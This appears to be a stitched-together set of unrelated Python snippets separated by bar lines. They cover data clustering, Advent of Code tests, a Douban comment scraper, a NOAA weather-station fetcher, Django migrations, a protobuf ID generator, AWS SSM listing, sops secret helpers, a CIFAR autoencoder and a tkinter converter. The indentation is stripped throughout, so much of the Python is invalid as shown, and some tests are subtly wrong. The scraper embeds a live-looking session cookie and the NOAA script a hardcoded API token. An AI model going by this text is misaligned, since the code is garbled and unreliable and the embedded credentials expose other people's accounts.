# Author:hua
import numpy as np
import sys
import pandas as pd
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.cluster import KMeans
# 接收外部传入的参数
filename = sys.argv[1]
# filename = "admin2.csv"
# 获取数据源
# print("start to read file")
case_train = np.genfromtxt("{}".format(filename), delimiter=',',encoding="utf-8")
case_train1 = np.delete(case_train,0,axis=0)
try:
v = pd.read_csv("{}".format(filename),header=None,encoding="utf-8")
except Exception as e:
print(e)
# 读取关键字
keywords = pd.read_csv("{}".format(filename), nrows=0,encoding="utf-8")
keywords = list(keywords)
# 去除第一行和第一列(如果有字段名的话)
case_train = np.delete(case_train,0,axis=0)
case_train1=np.array(case_train)
# 将矩阵反转为a
a = case_train1.T
# print(a)
global list1
global list3
global list4
global list6
global data_list
list1 = []
list3 = []
list4 = []
list6 = []
data_list = []
total_dic = {}
for i in a:
for k in a:
c = [i,k]
# 对两个矩阵对比后,得到的矩阵求和(AB共同出现的频率)
# 求每两行的最小值(AB交集的最小值)
ik = np.min(c, axis=0)
sum_two = ik.sum()
list3.append(sum_two)
n = len(a)
# 两两共现的词频矩阵
data_save = [list3[i:i + n] for i in range(0, len(list3), n)]
data_save = np.array(data_save)
# 加关键词后的相似矩阵
# data_save = DataFrame(data_save,index=keywords,columns=keywords)
clf = PCA(n_components=2)
data_save = clf.fit_transform(data_save)
# 构造聚类器,构造一个聚类数为n的聚类器,也就是聚类树形图分类数
estimator = KMeans(n_clusters=3)
# 聚类
estimator.fit(data_save)
# 获取聚类标签
label_pred = estimator.labels_
# 颜色的分类
mark = ['or', 'ob', 'og', 'ok', '^r', '+r', 'sr', 'dr', '<r', 'pr']
# 获取聚类中心
centroids = estimator.cluster_centers_
# 获取聚类准则的总和
inertia = estimator.inertia_
data_save = data_save.T
# print(data_save)
x = data_save[0]
y = data_save[1]
fig = plt.figure(figsize=(30, 25),dpi=80)
plt.scatter(x, y)
# 这里xy是需要标记的坐标,xytext是对应的标签坐标
for i in range(len(x)):
plt.annotate(keywords[i], xy = (x[i], y[i]), xytext = (x[i]+0.1, y[i]+0.1))
picname = filename.replace(".csv","")
picname = picname+"_kmeans.png"
plt.savefig(picname)
|
# this is a simple attempt to make a *navigable* documentation within |Vim|
from sage.rings.integer import Integer
from riordan_utils import *
from riordan_group import *
from riordan_visiting import *
class AbstractTriangleShape:
def format_tikz_node_template_string(self, **kwds):
return self.build_tikz_node_template_string().format(**kwds)
def build_tikz_node_template_string(self):
return (r'\node[box={colour}] (p-{row}-{col}) at ('
+ self.build_column_offset_template_substring() + r',-{row}) {{}};')
def build_column_offset_template_substring(self): pass
class PlainTriangleShape(AbstractTriangleShape):
def build_column_offset_template_substring(self):
return r'{col}'
def __str__(self):
return 'plain'
class CenteredTriangleShape(AbstractTriangleShape):
def build_column_offset_template_substring(self):
return r'-{row}/2+{col}'
def __str__(self):
return 'centered'
class NegativesStrFormatter:
def __init__(self, negatives_handling_choice):
self.negatives_handling_choice = negatives_handling_choice
def __str__(self):
return self.negatives_handling_choice.dispatch_on(self)
def dispatched_from_IgnoreNegativesChoice(self, choice):
return "ignore"
def dispatched_from_HandleNegativesChoice(self, choice):
return "handle"
class ColouringTemplateStringBuilder:
def build_using(self, target):
return target.dispatch_on(self)
def dispatched_from_ForFilename(self, for_target):
return r"{colouring_scheme}-{negatives}-negatives-{shape}-colouring-{rows}-rows"
def dispatched_from_ForSummary(self, for_target):
return r"{colouring_scheme}, {negatives} negatives, {shape} colouring, {rows} rows"
class TriangleColouring:
def __init__(self, colouring_scheme, order=127, centered=True, handle_negatives=False):
self.colouring_scheme = colouring_scheme
self.order = order
self.shape = CenteredTriangleShape() if centered else PlainTriangleShape()
self.negatives_handling_choice = (HandleNegativesChoice() if handle_negatives
else IgnoreNegativesChoice())
self.template_string_builder = ColouringTemplateStringBuilder()
def str_for(self, filename=False, summary=False):
template_target = ForFilename() if filename else ForSummary()
template_string = self.template_string_builder.build_using(template_target)
return template_string.format(
colouring_scheme=self.colouring_scheme,
shape=self.shape,
rows=self.order,
negatives=NegativesStrFormatter(self.negatives_handling_choice))
def colouring(self, partitioning,
on_tikz_node_generated=lambda node: node,
casting_coeff=lambda coeff: Integer(coeff)):
def handler(row_index, col_index, coeff):
eqclass_witness = partitioning.partition(
self.negatives_handling_choice, casting_coeff(coeff))
colour_code = partitioning.colours_table().colour_of(
self.negatives_handling_choice, eqclass_witness)
tikz_node = on_tikz_node_generated(
self.shape.format_tikz_node_template_string(
row=row_index, col=col_index, colour=colour_code))
return tikz_node
return handler, None
def __call__(self, d=None, h=None, array=None,
explicit_matrix=None, partitioning=None,
handle_triangular_region_only=True):
colouring_handlers = self.colouring(partitioning)
order = self.order
if d and h:
# First ensures that both `d' both `h' use the same *indeterminate*
assert d.args() == h.args() and len(d.args()) == 1
Riordan_array = RiordanArray(
SubgroupCharacterization(
VanillaDHfunctionsSubgroup(d, h, d.args()[0])))
elif explicit_matrix:
Riordan_array, order = explicit_matrix, explicit_matrix.dimensions()[0]
elif array: Riordan_array = array
else: raise Exception("No array to work with")
result_matrix, tikz_coloured_nodes, _ = Riordan_matrix_latex_code (
array=Riordan_array, order=order,
handlers_tuple=colouring_handlers,
handle_triangular_region_only=handle_triangular_region_only)
return result_matrix, tikz_coloured_nodes
|
def test_challenge1():
from challenge1 import ENTRIES, get_entries_summing_to
assert get_entries_summing_to(ENTRIES, 2020) == (438, 1582)
assert get_entries_summing_to(ENTRIES, 2020, 3) == (688, 514, 818)
def test_challenge2():
from challenge2 import PASSWORDS, get_number_of_valid_passwords, get_number_of_old_valid_passwords
assert get_number_of_old_valid_passwords(PASSWORDS) == 410
assert get_number_of_valid_passwords(PASSWORDS) == 694
def test_challenge3():
from challenge3 import TREE_GRID, get_number_of_trees_hit
assert get_number_of_trees_hit(TREE_GRID, 3) == 265
def test_challenge4():
from challenge4 import PASSPORTS, get_number_of_valid_passports, get_number_of_valid_data_passports
assert get_number_of_valid_passports(PASSPORTS) == 222
assert get_number_of_valid_data_passports(PASSPORTS) == 140
def test_challenge5():
from challenge5 import BOARDING_PASSES, get_highest_seat_id, find_seat_id
assert get_highest_seat_id(BOARDING_PASSES) == 976
assert find_seat_id(BOARDING_PASSES) == 685
def test_challenge6():
from challenge6 import QUESTIONS, get_sum_of_all_yes_counts, get_sum_of_any_yes_counts
assert get_sum_of_any_yes_counts(QUESTIONS) == 6506
assert get_sum_of_all_yes_counts(QUESTIONS) == 3243
def test_challenge7():
from challenge7 import BAG_RULES, get_number_of_bags_able_to_hold_bag, get_number_of_bags_inside
assert get_number_of_bags_able_to_hold_bag(BAG_RULES, "shiny gold") == 302
assert get_number_of_bags_inside(BAG_RULES, "shiny gold") == 4165
def test_challenge8():
from challenge8 import INSTRUCTIONS, Computer, get_accumulator_after_fixing_program
computer = Computer(INSTRUCTIONS)
assert computer.get_accumulator_after_stop()[1] == 1797
assert get_accumulator_after_fixing_program(INSTRUCTIONS) == 1036
def test_challenge9():
from challenge9 import NUMBERS, find_first_wrong_number, find_encryption_weakness
assert find_first_wrong_number(NUMBERS) == 21806024
assert find_encryption_weakness(NUMBERS) == 2986195
def test_challenge10():
from challenge10 import ADAPTERS, find_all_ways_to_arrange_adapters, get_joltage_product
assert get_joltage_product(ADAPTERS) == 1820
assert find_all_ways_to_arrange_adapters(ADAPTERS) == 3454189699072
# skipping 11 - it takes too long
def test_challenge12():
from challenge12 import MOVES, get_manhattan_distance_after_waypoint_moves, get_manhattan_distance_after_travelling
assert get_manhattan_distance_after_travelling(MOVES) == 2847
assert get_manhattan_distance_after_waypoint_moves(MOVES) == 29839
def test_challenge13():
from challenge13 import TIMESTAMP, BUS_IDS, find_timestamp_for_consecutive_busses, get_first_bus_after_timestamp
assert get_first_bus_after_timestamp(TIMESTAMP, BUS_IDS) == 2045
assert find_timestamp_for_consecutive_busses(BUS_IDS) == 402251700208309
def test_challenge14():
from challenge14 import INSTRUCTIONS, get_sum_of_memory, get_sum_of_memory_v2
assert get_sum_of_memory(INSTRUCTIONS) == 11612740949946
assert get_sum_of_memory_v2(INSTRUCTIONS) == 3394509207186
def test_challenge15():
from challenge15 import PREAMBLE, get_nth_word_spoken
assert get_nth_word_spoken(PREAMBLE, 10 == 273)
assert get_nth_word_spoken(PREAMBLE, 300000 == 47205)
def test_challenge16():
from challenge16 import TICKET_DATA
assert TICKET_DATA.get_ticket_scanning_error_rate() == 25984
assert TICKET_DATA.get_departure_fields_product() == 1265347500049
def test_challenge17():
from challenge17 import STARTING_DATA, get_active_squares_after_n_cycles
assert get_active_squares_after_n_cycles(STARTING_DATA, 6) == 359
def test_challenge18():
from challenge18 import EQUATIONS, get_sum_of_equations
assert get_sum_of_equations(EQUATIONS) == 8298263963837
assert get_sum_of_equations(EQUATIONS, True) == 145575710203332
def test_challenge19():
from challenge19 import MESSAGE_DATA_WITH_SUBSTITUTIONS, MESSAGE_DATA
assert MESSAGE_DATA.get_number_of_matching_rules("0") == 241
assert MESSAGE_DATA_WITH_SUBSTITUTIONS.get_number_of_matching_rules("0") == 424
def test_challenge20():
from challenge20 import ASSEMBLED_TILES, get_corners_multiplied, get_non_sea_monsters
assert get_corners_multiplied(ASSEMBLED_TILES) == 111936085519519
assert get_non_sea_monsters(ASSEMBLED_TILES) == 1792
def test_challenge21():
from challenge21 import MEALS, get_number_of_times_nonallergen_ingredients_appear, get_canonically_dangerous_ingredient
assert get_number_of_times_nonallergen_ingredients_appear(MEALS) == 2203
assert get_canonically_dangerous_ingredient(MEALS) == 'fqfm,kxjttzg,ldm,mnzbc,zjmdst,ndvrq,fkjmz,kjkrm'
def test_challenge22():
from challenge22 import DECKS, get_winning_score_recursive, get_winning_score
assert get_winning_score(DECKS) == 33098
assert get_winning_score_recursive(DECKS) == 35055
def test_challenge23():
from challenge23 import ARRANGEMENT, get_labels_after_1
assert get_labels_after_1(ARRANGEMENT, 100) == '39564287'
def test_challenge24():
from challenge24 import TILES, get_final_number_of_flipped_tiles, get_flipped_tiles
assert get_flipped_tiles(TILES) == 312
assert get_final_number_of_flipped_tiles(TILES) == 3733
def test_challenge25():
from challenge25 import get_encryption_key, CARD_PUBLIC_KEY, DOOR_PUBLIC_KEY
assert get_encryption_key(CARD_PUBLIC_KEY, DOOR_PUBLIC_KEY) == 11576351
|
list = ['1', '2','3']
list1 = list.copy()
print(list)
print(list1) |
import requests
import re
from bs4 import BeautifulSoup
from lxml import etree
import time
head = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0',
'Host': 'movie.douban.com',
'Cookie': 'll="118208"; bid=7oCzYf0fk0w; _pk_ref.100001.4cf6=%5B%22%22%2C%22%22%2C1'
'543191350%2C%22https%3A%2F%2Fwww.baidu.com%2Fs%3Fie%3Dutf-8%26f%3D8%26rsv_b'
'p%3D1%26rsv_idx%3D1%26tn%3Dmonline_6_dg%26wd%3D%25E8%25B1%2586%25E7%2593%25'
'A3%26oq%3D%2525E7%25258C%2525AB%2525E7%25259C%2525BC%2525E7%252594%2525B5%'
'2525E5%2525BD%2525B1%26rsv_pq%3D92f0bbb10001cda4%26rsv_t%3D8bc8J0WsOLTeWlY'
'lTmTtiC2GrQJJ%252Bjv4IBc%252BiO%252FoESrXmrO3%252FfpNx%252FJTDJnnzkObnLrS%2'
'6rqlang%3Dcn%26rsv_enter%3D1%26inputT%3D1016%26rsv_sug3%3D41%26rsv_sug1%3D'
'36%26rsv_sug7%3D100%26rsv_sug2%3D0%26rsv_sug4%3D1712%22%5D; _pk_id.100001.4'
'cf6=e5dddf1ba3ddddc7.1543191350.1.1543191673.1543191350.; _pk_ses.100001.4c'
'f6=*; ap_v=0,6.0; __yadk_uid=zaO3DBqlq1sYsYvkjrtRzfCR1VaIP7Vn; __utma=3014'
'9280.81002317.1543191351.1543191351.1543191351.1; __utmb=30149280.0.10.154'
'3191351; __utmc=30149280; __utmz=30149280.1543191351.1.1.utmcsr=(direct)|ut'
'mccn=(direct)|utmcmd=(none); __utma=223695111.1225746777.1543191351.1543191'
'351.1543191351.1; __utmb=223695111.0.10.1543191351; __utmc=223695111; __utmz=2'
'23695111.1543191351.1.1.utmcsr=baidu|utmccn=(organic)|utmcmd=organic|utmctr=%E'
'8%B1%86%E7%93%A3; _vwo_uuid_v2=DFAB26D354461D79AFD2E9930EE48773C|babee1b1bca2'
'dad586f81c66493a0f5d'
}
params = {
'limit': "20",
'sort': "new_score",
'start': None,
'status': 'P'
}
comment_user = []
comment_info = []
def url(n):
global params
url_init = 'https://movie.douban.com/subject/3168101/comments?start={}&limit=20&sort=new_score&status=P'
params['start'] = n
return url_init.format(n)
def get_page(page_url):
global params
ht = requests.get(page_url, headers=head, params=params)
ht.encoding = 'utf-8'
return ht.text
def parse_with_re(response):
global comment_info, comment_user
commenttext = []
author = re.findall(r'<a title="(.*?)" href=', response)
commenttime = re.findall(r'class="comment-time " title="(.*?)">', response)
commenttextt = re.findall(r'class="short">((.|\n)*?)</span>', response)
# 获取评论内容,注意换行符和其他字符在正则中的问题
for each in commenttextt:
commenttext.append(each[0])
temp_num = len(commenttextt)
for every in range(temp_num):
comment_user.append(author[every])
# 将用户名存入一个列表
comment_info.append((commenttime[every], commenttext[every]))
# 将评论日期和内容组成元组后存入一个列表
return
def parse_with_bs(response):
global comment_user, comment_info
# 声明全局变量
com_user = []
# 暂时存放用户名的列表
respsoup = BeautifulSoup(response, 'lxml')
temp_user = respsoup.find_all('div', class_="avatar")
# 获取的是一个标签的列表
for every in temp_user:
com_user.append(every.a.get('title'))
# 对标签列表进行遍历,对每一项提取出子节点a的title属性,即用户名的值
temp_time = respsoup.find_all('span', class_="comment-time ")
# 同样也是标签列表
temp_comment = respsoup.find_all('span', class_="short")
temp_num = len(temp_comment)
for each in range(temp_num):
# 遍历标签列表,对每一项提取所需要的元素
# 提取文本的话,直接 tag.text
comment_user.append(com_user[each])
comment_info.append((temp_time[each].get('title'), temp_comment[each].text))
return
def parse_with_lxml(response):
# 感觉xpath比bs写得顺手些
global comment_info, comment_user
resplx = etree.HTML(response)
temp_user = resplx.xpath('//div[@class="avatar"]/a/@title')
temp_time = resplx.xpath('//span[@class="comment-time "]/@title')
temp_comment = resplx.xpath('//span[@class="short"]/text()')
temp_num = len(temp_comment)
for each in range(temp_num):
comment_user.append(temp_user[each])
comment_info.append((temp_time[each], temp_comment[each]))
return
if __name__ == '__main__':
start_time = time.time()
for i in range(1):
# range() 里可以设置需要爬取的页数
print('正在爬取第 %d 页' % (i+1))
resp = get_page(url(i))
parse_with_bs(resp)
length = len(comment_info)
with open('venom.csv', 'w', encoding='utf-8') as f:
for i in range(length):
f.write('"用户名",{0},"评论时间",{1},"评论内容",{2}\n'.format(
comment_user[i],
comment_info[i][0],
comment_info[i][1]))
# with open('venom.csv', 'w') as csvfile:
# csvfile.write(codecs.BOM_UTF8)
# file = csv.writer(csvfile, dialect='excel')
# for i in range(length):
# file.writerow('"用户名",{0},"评论时间",{1},"评论内容",{2}\n'.format(
# comment_user[i],
# comment_info[i][0],
# comment_info[i][1]))
# print(comment_info[4][1]) # 检查是否乱码
# for nn in comment_info:
# print(nn[1])
end_time = time.time()
all_time = end_time - start_time
print(all_time)
|
import requests
import json
import pandas as pd
#
# Get all weather stations available at Climate Data Online Web Services
# found on the map within USA coordinates +/- Bermuda, Bahamas etc. having name ending in US
# having data available starting start_date
# Service Doc: https://www.ncdc.noaa.gov/cdo-web/webservices/v2#stations
#
# in: https://www.ncdc.noaa.gov/cdo-web/api/v2/stations
# out: stations.json ->
# [ {"elevation":0,
# "mindate":"yyyy-mm-dd",
# "maxdate":"yyyy-mm-dd",
# "latitude":32.3667,
# "name":"",
# "datacoverage":[0-1),
# "id":"",
# "elevationUnit":"METERS",
# "longitude":-64.6833
# }, ... ]
#
cdo_token = 'davQIOzciXPWdFXJzJLAZXGfCdyrOEiq'
header = {'token': cdo_token}
base_url = 'https://www.ncdc.noaa.gov/cdo-web/api/v2'
stations_endpoint = '/stations'
# get number of stations available
start_date = '2019-12-01'
usa_extent = '15.82,-166.5,70.0,-62.0'
response = requests.get(base_url + stations_endpoint,
params={'startdate': start_date,
'extent': usa_extent},
headers=header)
station_count = response.json()['metadata']['resultset']['count']
# get stations
limit = 1000
offset = 0
no_requests = station_count // limit + 1
stations = []
for i in range(no_requests):
params = {'offset': offset, 'limit': limit, 'startdate': start_date, 'extent': usa_extent}
response = requests.get(base_url + stations_endpoint, params=params, headers=header)
assert response.status_code == 200
stations_subset = response.json()['results']
for station in stations_subset:
if station['name'][-3:] == ' US':
stations.append(station)
offset += limit
output_type = 'csv'
output_file = 'stations'
if output_type == 'json':
output_structure = {'count': len(stations), 'stations': stations}
with open(output_file + '.json', 'w') as f:
json.dump(output_structure, f)
elif output_type == 'csv':
df = pd.DataFrame(stations)
df.to_csv(output_file + '.csv', index=False)
print('Saved ' + str(len(stations)) + ' stations to ' + output_file)
|
#!/Users/apple/silver/projects/PERSONAL/STEGANOGRAPHY/stenoENV/bin/python3.8
import sys
from lib2to3.main import main
sys.exit(main("lib2to3.fixes"))
|
# Usage: $ python3 get_sac_files_lines.py /home/kevin/Desktop/sac-data/stats output.csv
# python3 get_sac_files_lines.py <merged_files> <merged_files> <output_path>
#
# Merges all the extracted contribution per tag data into one single file.
__author__ = 'kevin'
import sys
import csv
import os
# RQ 1: Generate a csv file for each project with: file, release, if its SAC, LOC
csv_header = ['project',
'70% lines', '70% files',
'80% lines', '80% files',
'90% lines', '90% files']
def main(argv):
data_dir = argv[1]
output_file = argv[2]
result = []
for data_file in os.listdir(data_dir):
with open(os.path.join(data_dir, data_file), newline="") as csv_file:
data = [{ 'contrib_percent': float(row['top_single_dev_contribution_knowledge_percent']),
'lines': float(row['lines_count'])} for row in csv.DictReader(csv_file)]
total_lines = sum([f['lines'] for f in data])
total_files = len(data)
result.append({
'project': data_file,
'70% lines': round((sum([f['lines'] for f in data if f['contrib_percent'] >= 70 ]) / total_lines) * 100, 1),
'70% files': round((len([f for f in data if f['contrib_percent'] >= 70 ]) / total_files) * 100, 1),
'80% lines': round((sum([f['lines'] for f in data if f['contrib_percent'] >= 80 ]) / total_lines) * 100, 1),
'80% files': round((len([f for f in data if f['contrib_percent'] >= 80 ]) / total_files) * 100, 1),
'90% lines': round((sum([f['lines'] for f in data if f['contrib_percent'] >= 90 ]) / total_lines) * 100, 1),
'90% files': round((len([f for f in data if f['contrib_percent'] >= 90 ]) / total_files) * 100, 1)
})
with open(output_file, 'w', newline='') as output:
writer = csv.DictWriter(output, csv_header)
writer.writeheader()
writer.writerows(result)
if __name__ == "__main__":
main(sys.argv)
|
import sys
import os
f = open("C:/Users/user/Documents/atCoderProblem/import.txt","r")
sys.stdin = f
# -*- coding: utf-8 -*-
n = int(input())
s = list(input())
def list_intersection(a,b):
c = []
for i in range(len(a)):
for j in range(len(b)):
if a[i] == b[j]:
c.append(a[i])
a[i] = "_"
b[j] = "&"
return c
ans = 0
for i in range(1,n):
inter = list_intersection(s[:i],s[i:])
inter = set(inter)
inter = list(inter)
ans = max(ans,len(inter))
print(ans)
|
# Generated by Django 3.0.3 on 2020-05-11 18:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dimensoes', '0009_auto_20200504_1529'),
]
operations = [
migrations.AlterField(
model_name='dimensaomodel',
name='comprimento',
field=models.FloatField(),
),
migrations.AlterField(
model_name='dimensaomodel',
name='espessura',
field=models.CharField(max_length=3),
),
migrations.AlterField(
model_name='dimensaomodel',
name='fornecedor',
field=models.CharField(max_length=8),
),
migrations.AlterField(
model_name='dimensaomodel',
name='largura',
field=models.FloatField(),
),
migrations.AlterField(
model_name='dimensaomodel',
name='largura_calcada',
field=models.FloatField(),
),
migrations.AlterField(
model_name='dimensaomodel',
name='prof_final',
field=models.FloatField(),
),
migrations.AlterField(
model_name='dimensaomodel',
name='prof_inicial',
field=models.FloatField(),
),
]
|
#!/usr/bin/python
#-*- coding: utf-8 -*-
#生成Java和CSharp所需要的MessageID文件
import os
import sys
#设置初始ID值,这里必须从20002开始,server端定义login方法如果不是20002就返回错误,fuck!!!
start_index = 20002
java_class_name = "HOpCodeEx.java"
cs_class_name = "MessageID.cs"
proto_file = open("PBMessage.proto","r")
lines = proto_file.readlines()
#删除旧文件
if os.path.exists(java_class_name):
os.remove(java_class_name)
if os.path.exists(cs_class_name):
os.remove(cs_class_name)
#-------------------------临时添加PacketDistributed在这里开始-------------------------
PacketDistributed_class_name = "PacketDistributed.cs"
if os.path.exists(PacketDistributed_class_name):
os.remove(PacketDistributed_class_name)
#-------------------------临时添加PacketDistributed在这里结束-------------------------
# 初始化CS文件
newCSharplines = []
newCSharpFile = open(cs_class_name,"wb")
newCSharpFile.write("//Auto Generate File, Do NOT Modify!!!!!!!!!!!!!!!\n")
newCSharpFile.write("using System;\n")
newCSharpFile.write("namespace xjgame.message\n")
newCSharpFile.write("{\n")
newCSharpFile.write("\tpublic enum MessageID\n")
newCSharpFile.write("\t{\n")
#初始化JAVA文件
newJavaFile = open(java_class_name,"wb")
newJavaFile.write("package xjgame.server;\n")
newJavaFile.write("//Auto Generate File, Do NOT Modify!!!!!!!!!!!!!!!\n")
newJavaFile.write("import cyou.mrd.io.http.HOpCode;\n")
newJavaFile.write("public class HOpCodeEx extends HOpCode {\n")
#遍历生成ID
for line in lines:
#if line.startswith("//"):
#newCSharpFile.write( "%s" % (line))
#newJavaFile.write( "%s" % (line))
if line.startswith("message"):
text = line.split(' ')
if text[1].find("\n") > 0:
message_name = text[1].split("\n")
else:
message_name = text[1]
newCSharpFile.write( "\t\t%s = %s,\n" % (message_name[0],start_index))
newJavaFile.write( "\tpublic static final short %s = %s;\n" % (message_name[0],start_index))
start_index = start_index + 1
print message_name[0]
#java文件结束
newJavaFile.write("\n}\n")
newJavaFile.close()
#c sharp文件结束
newCSharpFile.write("\n\t}\n")
#-------------------------临时添加Enum在这里开始-------------------------
inEnum = False
for line in lines:
if line.find("enum ") > 0:
inEnum = True
newCSharpFile.write( "\tpublic %s" % (line))
print line
elif inEnum == True:
if line.find("}") > 0:
inEnum = False
if line.find(";") > 0:
line = line.split(';')
line = "%s,\n" % (line[0])
newCSharpFile.write( "\t%s" % (line))
print line
#-------------------------临时添加Enum在这里结束-------------------------
#-------------------------临时添加PacketDistributed在这里开始-------------------------
#初始化
PacketDistributedFile = open(PacketDistributed_class_name,"wb")
PacketDistributedFile.write("//Auto Generate File, Do NOT Modify!!!!!!!!!!!!!!!\n")
PacketDistributedFile.write(
'''
using System.IO;
using System;
using System.Net.Sockets;
using Google.ProtocolBuffers;
using xjgame.message;
using card.net;
public abstract class PacketDistributed\n
{
public static PacketDistributed CreatePacket(MessageID packetID)
{
PacketDistributed packet = null;
switch (packetID)
{
''')
#遍历生成case
for line in lines:
if line.startswith("message"):
text = line.split(' ')
if text[1].find("\n") > 0:
message_name = text[1].split("\n")
else:
message_name = text[1]
PacketDistributedFile.write( "\t\t\tcase MessageID.%s: { packet = new %s();}break;\n" % (message_name[0],message_name[0]))
PacketDistributedFile.write(
'''
}
if (null != packet)
{
packet.packetID = packetID;
}
//netActionTime = DateTime.Now.ToFileTimeUtc();
return packet;
}
public byte[] ToByteArray()
{
//Check must init
if (!IsInitialized())
{
throw InvalidProtocolBufferException.ErrorMsg("Request data have not set");
}
byte[] data = new byte[SerializedSize()];
CodedOutputStream output = CodedOutputStream.CreateInstance(data);
WriteTo(output);
output.CheckNoSpaceLeft();
return data;
}
public PacketDistributed ParseFrom(byte[] data)
{
CodedInputStream input = CodedInputStream.CreateInstance(data);
PacketDistributed inst = MergeFrom(input,this);
input.CheckLastTagWas(0);
return inst;
}
public abstract int SerializedSize();
public abstract void WriteTo(CodedOutputStream data);
public abstract PacketDistributed MergeFrom(CodedInputStream input,PacketDistributed _Inst);
public abstract bool IsInitialized();
protected MessageID packetID;
public MessageID getMessageID()
{
return packetID;
}
}
'''
)
PacketDistributedFile.close()
#-------------------------临时添加PacketDistributed在这里结束-------------------------
newCSharpFile.write("}\n")
newCSharpFile.close()
proto_file.close()
|
import boto3
import json
def get_system_manager_info():
"""
A fucntion that gives the associations and documents details
"""
conn = boto3.client('ec2')
regions = [region['RegionName'] for region in conn.describe_regions()['Regions']]
association_details = []
document_details = []
command_details = []
for region in regions:
client = boto3.client('ssm', region_name=region)
# list associations to get association names
response = client.list_associations()['Associations']
association_names = []
# appending the names
for res in response:
association_names.append(res['Name'])
# describing each association
for name in association_names:
response = client.describe_association(
Name=name
)['AssociationDescription']
req_info = []
req_info.append(response)
# appending each assocaition as seperate lists
association_details.append(req_info)
# list documents to get document names
response = client.list_documents()['DocumentIdentifiers']
doc_names = []
for res in response:
doc_names.append(res['Name'])
# describe each document
for name in doc_names:
response = client.describe_document(
Name=name
)['Document']
req_info = []
req_info.append(response)
# append each document as seperate list
document_details.append(req_info)
# get command info
response = client.list_commands()['Commands']
for res in response:
req_info = []
req_info.append(res)
command_details.append(req_info)
# convert docuents and commands into dictionary
dict_associations = {"Associations": association_details}
dict_documents = {"Documents": document_details}
dict_commands = {"Commands": command_details}
# convert dictionary into json
json_associations = json.dumps(dict_associations, indent=4, default=str)
json_documents = json.dumps(dict_documents, indent=4, default=str)
json_commands = json.dumps(dict_commands, indent=4, default=str)
print(json_associations)
print(json_documents)
print(json_commands)
get_system_manager_info()
|
# Generated by Django 2.2.1 on 2019-07-28 13:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('notice', '0013_comment_comment_writer'),
]
operations = [
migrations.AlterModelOptions(
name='notice',
options={'ordering': ['-pub_date']},
),
]
|
a = 'mini'
b = 'ari'
print "%r/n loves %r !" %( a , b )
|
import base64
import eventlet
import os
import subprocess
import sys
import yaml
from forge.tasks import sh, TaskError
def key_check():
if not os.getenv('SOPS_KMS_ARN'):
raise TaskError("You must obtain the master key and export it in the 'SOPS_KMS_ARN' environment variable")
def decrypt(secret_file_dir, secret_file_name):
key_check()
secret_file_path = os.path.join(secret_file_dir, secret_file_name)
temp_secret_file_path = os.path.join(secret_file_dir, "tmp-" + secret_file_name)
os.rename(secret_file_path, temp_secret_file_path)
decrypted_content = sh("sops", "--output-type", "binary", "-d", temp_secret_file_path).output
with open(secret_file_path, "w") as decrypted_file:
decrypted_file.write(decrypted_content)
def decrypt_cleanup(secret_file_dir, secret_file_name):
secret_file_path = os.path.join(secret_file_dir, secret_file_name)
temp_secret_file_path = os.path.join(secret_file_dir, "tmp-" + secret_file_name)
os.remove(secret_file_path)
os.rename(temp_secret_file_path, secret_file_path)
def edit_secret(secret_file_path, create):
key_check()
if not os.path.exists(secret_file_path):
if not create:
raise TaskError("no such file: %s" % secret_file_path)
content = sh("sops", "--input-type", "binary", "-e", "/dev/null").output
try:
with open(secret_file_path, "w") as fd:
fd.write(content)
except IOError, e:
raise TaskError(e)
try:
subprocess.check_call(["sops", "--input-type", "binary", "--output-type", "binary", secret_file_path])
except eventlet.green.subprocess.CalledProcessError, e:
raise TaskError(e)
def view_secret(secret_file_path):
key_check()
try:
subprocess.check_call(["sops", "--output-type", "binary", "-d", secret_file_path])
except eventlet.green.subprocess.CalledProcessError, e:
raise TaskError(e)
|
"""
Train Script of Auto Encoder Model
"""
import numpy as np
import torch
import torchvision
import torchvision.transforms as transforms
import torch.optim as optim
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from model import AutoEncoder, CAE
from load_data import ImbalancedCIFAR10
device = 'cuda:0' if torch.cuda.is_available() else 'cpu'
train_imbalance_class_ratio = np.array([1., 1., .5, 1., .5, 1., 1., 1., 1., .5])
#train_imbalance_class_ratio = np.array([1.] * 10)
train_imbalanced_dataset = ImbalancedCIFAR10(train_imbalance_class_ratio)
train_imbalanced_loader = DataLoader(train_imbalanced_dataset, batch_size=64, shuffle=True, num_workers=4)
# net = AutoEncoder()
net = CAE()
net = net.to(device)
criterion = nn.BCELoss()
# criterion = nn.MSELoss()
optimizer = optim.Adam(net.parameters())
# Train Model
for epoch in range(3):
running_loss = 0.0
for i, (inputs, _) in enumerate(train_imbalanced_loader, 0):
inputs = inputs.to(device)
outputs = net(inputs)
loss = criterion(outputs, inputs)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
if i % 200 == 199:
print('[%d, %5d] loss: %.3f' %
(epoch + 1, i + 1, running_loss / 200))
running_loss = 0.0
# Save Model
torch.save(net.state_dict(), 'model_weights/auto_encoder')
|
s1={"a","e","i","o","u"}
s2={"k","l",'m',"n","o"}
s3=s1-s2
print(s3)
s4=s2-s1
print(s4)
print(s4-s3)
|
STM_message1 = "Welcome to Spin That Mission!"
print(STM_message1)
STM_message2 = "Click Ok to Start"
print(STM_message2) |
import tkinter as tk
def recalc():
cel_temp = entry_cel.get() # get temp from text entry
try: # calculate converted temp and place it in label
far_temp = float(cel_temp) * 9/5 + 32
far_temp = round(far_temp, 2) # round to 2 decimal places
result_far.config(text=far_temp)
except ValueError:
result_far.config(text="invalid")
# create the application window and add a frame
window = tk.Tk()
window.title("Temp Converter")
frame = tk.Frame()
frame.grid(padx=5, pady=5) # pad top and left of frame 5 pixels before grid
# create and add text labels
label_cel = tk.Label(frame, text="Celsius Temp:")
label_cel.grid(row=1, column=1, sticky="w")
label_far = tk.Label(frame, text="Fahrenheit Temp:")
label_far.grid(row=2, column=1)
# create and add space for user entry of text
entry_cel = tk.Entry(frame, width=7)
entry_cel.grid(row=1, column=2)
entry_cel.insert(0,0)
# create and add label for text calculation result
result_far = tk.Label(frame, width=7)
result_far.grid(row=2, column=2)
# create and add 'recalc' button
btn_recalc = tk.Button(frame, text="Recalculate", command=recalc)
btn_recalc.grid(row=1, column=3, rowspan=2)
